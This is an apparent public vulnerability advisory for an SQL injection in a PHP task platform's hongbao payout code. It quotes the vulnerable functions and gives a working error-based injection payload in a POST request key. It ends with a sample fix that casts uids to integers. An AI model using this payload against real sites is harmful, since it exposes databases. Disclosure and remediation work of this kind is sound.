2015-09-18: Details reported to the vendor, awaiting vendor handling
2015-09-18: Vendor confirmed; details disclosed to the vendor only
2015-09-21: Details opened to third-party security partners (NSFOCUS, Tangchao Security Patrol)
2015-11-12: Details opened to core white hats and domain experts
2015-11-22: Details opened to regular white hats
2015-12-02: Details opened to intern white hats
2015-12-17: Details disclosed to the public
As the title says.
/www/lib/inc/CommonClass.php
```php
public static function changehongbao($task_id, $moneys, $uid, $money, $title, $g)
{
    // $uid is concatenated into the SQL with no quoting and no integer cast
    $result = db_factory::get_one('select * from ' . TABLEPRE . 'witkey_space where uid=' . $uid);
    if ($g) {
        $newbalance = $result['balance'] - $money + $moneys;
        db_factory::query('update ' . TABLEPRE . 'witkey_space set balance=' . $newbalance . ' where uid=' . $uid);
        keke_finance_class::insert_trust("in", "task_xg", $uid, -$money + $moneys, $newbalance);
    } else {
        $newbalance = $result['balance'] + $money;
        keke_finance_class::insert_trust("in", "finish_task", $uid, $money, $newbalance, $task_id);
        db_factory::query('update ' . TABLEPRE . 'witkey_space set balance=' . $newbalance . ' where uid=' . $uid);
        db_factory::query('update ' . TABLEPRE . 'witkey_space set is_hongbao=1 where uid=' . $uid);
        db_factory::query('update ' . TABLEPRE . 'witkey_task_work set work_status=4 where uid=' . $uid . ' and task_id=' . $task_id);
    }
    if (!$g) {
        $v_arr = array(
            "红包任务" => '【' . $title . '】',
            "红包金额" => $money
        );
        keke_msg_class::notify_user($uid, $result['username'], 'select', '红包任务完成通知', $v_arr);
    }
    return true;
}
```
As you can see, the uid parameter is passed into the query without being wrapped in single quotes. Let's look at where it is called: /www/control/select.php
```php
// ...
foreach ($cbk as $key => $val) {
    do {
        $lcg = lcg_value();
    } while ($lcg < 0.1);
    if (($key + 1) == $count) {
        $selefHongBao[$val] = $hongbaoSum;
    } else {
        $selefHongBao[$val] = number_format($lcg * $hongbaoSum, 2);
    }
    $hongbaoSum -= $selefHongBao[$val];
    $a += $selefHongBao[$val];
}
// $selefHongBao is not reset before the loop above, so a key supplied through the
// request (via the pseudo-global mechanism) is iterated here as well
foreach ($selefHongBao as $k => $v) {
    CommonClass::changehongbao($task_id, $task_info[0]['task_cash'], $k, $v, $task_info[0]['task_title']);
}
CommonClass::changehongbao('', $task_info[0]['task_cash'], $gUid, $a, $task_info[0]['task_title'], 1);
// ...
```
As you can see, it is called here. $k comes from the keys of $selefHongBao. However, this program uses pseudo-globals, so we can add a key of our own to $selefHongBao. http://localhost:801/index.php?do=select
POST:
formhash=1&selefHongBao[111 and extractvalue(1,concat(0x5c,user()))]=1111&task_id=1
Filter the key values.
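The two-layer fix the report asks for, as an added example that is not the vendor's patch: the caller builds $selefHongBao from scratch so request-supplied keys cannot survive, and the data layer forces uid to an integer before it reaches SQL. It assumes db_factory::get_one() and TABLEPRE from the page; buildHongbaoSplit() and loadSpaceRow() are hypothetical names.

```php
<?php
// Added example, not the project's own code.
// Assumes db_factory::get_one() and the TABLEPRE constant from the page.

// 1. select.php side: explicit initialisation means nothing extracted from the
//    request by the pseudo-global mechanism can pre-populate the array, and
//    every key is an integer uid taken from the trusted $cbk list.
function buildHongbaoSplit(array $cbk, $hongbaoSum)
{
    $selefHongBao = array();          // no stray keys from $_REQUEST
    $count = count($cbk);
    foreach ($cbk as $i => $uid) {
        $uid = (int) $uid;
        if ($uid <= 0) {
            continue;                 // reject anything that is not a real uid
        }
        do {
            $lcg = lcg_value();
        } while ($lcg < 0.1);
        if (($i + 1) == $count) {
            $selefHongBao[$uid] = $hongbaoSum;
        } else {
            // round() keeps a float; number_format() would return a string
            $selefHongBao[$uid] = round($lcg * $hongbaoSum, 2);
        }
        $hongbaoSum -= $selefHongBao[$uid];
    }
    return $selefHongBao;
}

// 2. CommonClass side: do not rely on the caller; cast uid to int before it is
//    concatenated into SQL. A key such as "111 and extractvalue(...)" becomes
//    plain 111 and the injected expression is discarded.
function loadSpaceRow($uid)
{
    $uid = (int) $uid;
    if ($uid <= 0) {
        throw new InvalidArgumentException('invalid uid');
    }
    return db_factory::get_one('select * from ' . TABLEPRE . 'witkey_space where uid=' . $uid);
}

// Constructed sample input: a request-supplied, non-numeric key is dropped.
$split = buildHongbaoSplit(array(7, 9, '111 and 1=1'), 50.00);
// $split contains only integer keys 7 and 9
```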
Severity: Medium
Vulnerability Rank: 5
Confirmed at: 2015-09-18 10:47
Thanks for your attention.
None yet.